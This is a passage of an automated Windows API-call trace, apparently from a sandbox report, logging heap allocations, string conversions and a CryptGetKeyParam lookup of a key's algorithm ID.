RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x5975) returned 0x4521310 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0112.195] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0112.195] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0210 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0112.196] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0112.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0112.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0112.196] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0112.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0112.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0112.196] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0112.196] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0112.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0112.196] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2700 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0112.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca610 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0112.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0112.197] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0112.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0112.197] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0112.197] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0112.198] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.198] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0112.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0112.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0112.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0112.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0112.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.198] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0112.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0112.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0112.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0112.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0112.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0112.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0112.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0112.270] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0112.270] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0112.270] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0112.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0112.271] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0112.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0112.271] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0112.271] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0112.271] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0112.272] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0112.272] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0112.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0112.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0112.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0112.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0112.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0112.273] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0112.273] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0112.274] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0112.274] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.274] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0112.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0112.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796f08, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0112.275] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0112.276] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0112.276] CryptGetKeyParam (in: hKey=0x41abfc0, dwParam=0x7, pbData=0x43e28b0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28b0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0112.276] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0112.277] HeapFree (in: hHeap=0x1780000, 